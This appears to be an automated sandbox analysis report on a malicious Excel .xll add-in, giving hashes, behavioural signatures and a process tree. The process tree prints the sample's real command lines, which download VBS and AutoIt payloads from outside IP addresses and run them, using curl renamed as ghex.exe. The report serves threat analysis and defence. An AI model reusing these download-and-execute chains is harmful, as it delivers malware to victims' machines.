Analysis
-
max time kernel
139s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2023 16:51
Static task
static1
Behavioral task
behavioral1
Sample
98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Resource
win10v2004-20230915-en
General
-
Target
98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
-
Size
50KB
-
MD5
8866d0e530cb613fde59c5476ea6c331
-
SHA1
e77beeb201303b739a9c4536514e48adc2118900
-
SHA256
98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f
-
SHA512
73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea
-
SSDEEP
1536:9lnq2U5JsS6Nh5wFXscKjrtN/5zqGyiNwmHWR03aY:9c9HQNh5wFXscKXHRzaiNnVqY
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 39 1708 WScript.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
me.execmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation me.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
Processes:
me.exeghex.exeghex.exepid process 4036 me.exe 3860 ghex.exe 2856 ghex.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid process 4248 EXCEL.EXE 4248 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2316 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 39 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4248 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 4248 EXCEL.EXE 4248 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid process 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE 4248 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EXCEL.EXEme.execmd.exeWScript.execmd.exedescription pid process target process PID 4248 wrote to memory of 4036 4248 EXCEL.EXE me.exe PID 4248 wrote to memory of 4036 4248 EXCEL.EXE me.exe PID 4036 wrote to memory of 3628 4036 me.exe cmd.exe PID 4036 wrote to memory of 3628 4036 me.exe cmd.exe PID 3628 wrote to memory of 3848 3628 cmd.exe curl.exe PID 3628 wrote to memory of 3848 3628 cmd.exe curl.exe PID 3628 wrote to memory of 2316 3628 cmd.exe timeout.exe PID 3628 wrote to memory of 2316 3628 cmd.exe timeout.exe PID 3628 wrote to memory of 1708 3628 cmd.exe WScript.exe PID 3628 wrote to memory of 1708 3628 cmd.exe WScript.exe PID 1708 wrote to memory of 4624 1708 WScript.exe cmd.exe PID 1708 wrote to memory of 4624 1708 WScript.exe cmd.exe PID 4624 wrote to memory of 3860 4624 cmd.exe ghex.exe PID 4624 wrote to memory of 3860 4624 cmd.exe ghex.exe PID 4624 wrote to memory of 2856 4624 cmd.exe ghex.exe PID 4624 wrote to memory of 2856 4624 cmd.exe ghex.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Public\me.exeC:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\users\public\1.vbs3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\curl.exeC:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/1234⤵PID:3848
-
C:\Windows\system32\timeout.exetimeout 104⤵
- Delays execution with timeout.exe
PID:2316 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\users\public\1.vbs"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\ghex & cd /d c:\ghex & copy c:\windows\system32\curl.exe ghex.exe & ghex -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & ghex -o mhmbjb.au3 http://94.228.169.143:2351/msighexmaeh & Autoit3.exe mhmbjb.au35⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
\??\c:\ghex\ghex.exeghex -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:23516⤵
- Executes dropped EXE
PID:3860 -
\??\c:\ghex\ghex.exeghex -o mhmbjb.au3 http://94.228.169.143:2351/msighexmaeh6⤵
- Executes dropped EXE
PID:2856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Filesize50KB
MD58866d0e530cb613fde59c5476ea6c331
SHA1e77beeb201303b739a9c4536514e48adc2118900
SHA25698c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f
SHA51273d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea
-
C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Filesize50KB
MD58866d0e530cb613fde59c5476ea6c331
SHA1e77beeb201303b739a9c4536514e48adc2118900
SHA25698c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f
SHA51273d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b
-
Filesize
7KB
MD53097620a3397d233ac975f13d30c736a
SHA1c8ad6cb81dfe4ec1005c2ad12550251d3f76e307
SHA256b2cf2f92ab493c531a4ec7c0c9eb6f86cbb400f5bd63086054ab8e67336d78a7
SHA5120d84a9e296188f3a3d5097d851fda3aaeebdd2bfa1e57d14b7517fd795d81d139e833b87602ca81bb87bdaefe360161c70d27b49f581365bc288d2fb683542d9
-
Filesize
872KB
MD5a450a98579a0184c98f24bfe13346dd1
SHA1066b4770b49baa099dd03737bc0dcf27ce4e6204
SHA2564991fd43bc06aa10a3438615087abea5a2c864fbd017a341a9d3d8bdeb694483
SHA512eec47eac7ee18204f8247d2ffc22d27d63259c99420cc047046793aca33be440cb290b438b9dc3282a5e57e40f5582c78ea7a051a17525626885d24629141add
-
Filesize
411KB
MD51c3645ebddbe2da6a32a5f9fb43a3c23
SHA1086f74a35d5afed78ae50cf5586fafffb7845464
SHA2560ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b